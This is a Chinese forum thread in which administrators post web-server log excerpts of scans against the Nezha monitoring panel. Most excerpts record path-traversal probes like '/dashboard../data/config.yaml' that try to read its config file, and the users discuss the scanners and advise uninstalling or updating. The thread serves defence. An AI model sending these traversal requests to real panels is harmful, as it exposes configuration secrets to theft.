看了下nginx日志，还有人正在扫哪吒漏洞

14h 42min ago in 日常

User-Agent是Nezha-GHSA-5c25-7vpj-9mqh-Checker 赶紧先卸载或者关闭服务再说


/var/log/nginx/access.log:2602:ffe4:8:5287:a25b:4451:27b2:31f8 - - [16/Jun/2026:14:42:45 +0800] "GET /dashboard../data/config.yaml HTTP/2.0" 404 1938 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0"
/var/log/nginx/access.log:2602:ffe4:8:5287:a25b:4451:27b2:31f8 - - [16/Jun/2026:14:42:46 +0800] "GET /dashboard../data/config.yaml HTTP/2.0" 404 1938 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0"
/var/log/nginx/access.log:2602:ffe4:8:5287:a25b:4451:27b2:31f8 - - [16/Jun/2026:14:42:47 +0800] "GET /dashboard..%2Fdata/config.yaml HTTP/2.0" 404 1938 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0"

lehuoyisheng

14h 36min ago

#1

用的caddy

leji

14h 34min ago

122.10.198.233 - - [16/Jun/2026:14:25:18 +0800] "GET /dashboard../data/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"
122.10.198.233 - - [16/Jun/2026:14:25:19 +0800] "GET /dashboard../data/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"
122.10.198.233 - - [16/Jun/2026:14:25:19 +0800] "GET /dashboard..%2Fdata/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"
122.10.198.233 - - [16/Jun/2026:14:35:24 +0800] "GET /dashboard../data/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"
122.10.198.233 - - [16/Jun/2026:14:35:24 +0800] "GET /dashboard../data/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"
122.10.198.233 - - [16/Jun/2026:14:35:25 +0800] "GET /dashboard..%2Fdata/config.yaml HTTP/1.1" 404 1890 "-" "Nezha-GHSA-5c25-7vpj-9mqh-Checker/1.0" "-"


157.119.102.27 - - [16/Jun/2026:12:54:22 +0800] "GET /dashboard../data/config.yaml HTTP/1.1" 404 1890 "-" "Go-http-client/1.1" "-"

都是今天扫的，11号就更新了

coldsword

14h 10min ago

#3

这个命名有可能是🦞搓的脚本
MoeXia

14h 2min ago

#4

@X1721 #0 甚至不伪装一下ua，明扫
Marco919

14h 2min ago

#5

我昨晚都更新了今天下午1点多给插得agent 所以更新有何用？
X1721楼主

13h 57min ago

#6

@Marco919 #5 还是卸载保平安
X1721楼主

13h 56min ago

#7

@MoeXia #4 可能比较急

bncfbb

12h 43min ago edited 12h 41min ago

我这有伪装UA的，有python requests默认UA的，有摊牌了不装的NezhaCheck/1.0 ac01

[15/Jun/2026:18:10:09 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 114.242.3.63] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (compatible; NezhaCheck/1.0)" "-"
[15/Jun/2026:18:10:10 +0800] - - 301 - GET "/dashboard../data/config.yaml" [Client 114.242.3.63] [Length 166] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (compatible; NezhaCheck/1.0)" "-"
[15/Jun/2026:18:10:10 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 114.242.3.63] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (compatible; NezhaCheck/1.0)" "-"
[15/Jun/2026:20:48:30 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 212.87.194.242] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "python-requests/2.34.2" "-"
[15/Jun/2026:20:48:31 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 212.87.194.242] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "python-requests/2.34.2" "-"
[15/Jun/2026:20:48:31 +0800] - 502 502 - GET "/dashboard..%2Fdata/config.yaml" [Client 212.87.194.242] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "python-requests/2.34.2" "-"
[15/Jun/2026:21:22:21 +0800] - 502 502 - GET "/api/v1/server" [Client 67.159.48.147] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "python-requests/2.34.2" "-"
[16/Jun/2026:02:46:40 +0800] - 502 502 - GET "/api/v1/setting" [Client 77.247.127.114] [Length 556] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-"
[16/Jun/2026:02:46:41 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 77.247.127.114] [Length 556] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-"
[16/Jun/2026:02:46:41 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 77.247.127.114] [Length 556] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-"
[16/Jun/2026:02:48:54 +0800] - 502 502 - GET "/api/v1/server" [Client 67.159.48.147] [Length 154] [Gzip -] [Sent-to 127.0.0.1] "python-requests/2.34.2" "-"
[16/Jun/2026:15:08:16 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 165.154.255.124] [Length 556] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36" "-"
[16/Jun/2026:15:08:31 +0800] - - 301 - GET "/dashboard../data/config.yaml" [Client 165.154.255.124] [Length 166] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36" "-"
[16/Jun/2026:15:08:32 +0800] - 502 502 - GET "/dashboard../data/config.yaml" [Client 165.154.255.124] [Length 556] [Gzip -] [Sent-to 127.0.0.1] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36" "-"

jake

12h 32min ago

#9

有点夸张

看了下nginx日志，还有人正在扫哪吒漏洞

你好啊，陌生人!

快捷功能区

📈用户数目📈

🎉欢迎新用户🎉

所有版块

看了下nginx日志，还有人正在扫哪吒漏洞

你好啊，陌生人!

快捷功能区

所有版块

📈用户数目📈

🎉欢迎新用户🎉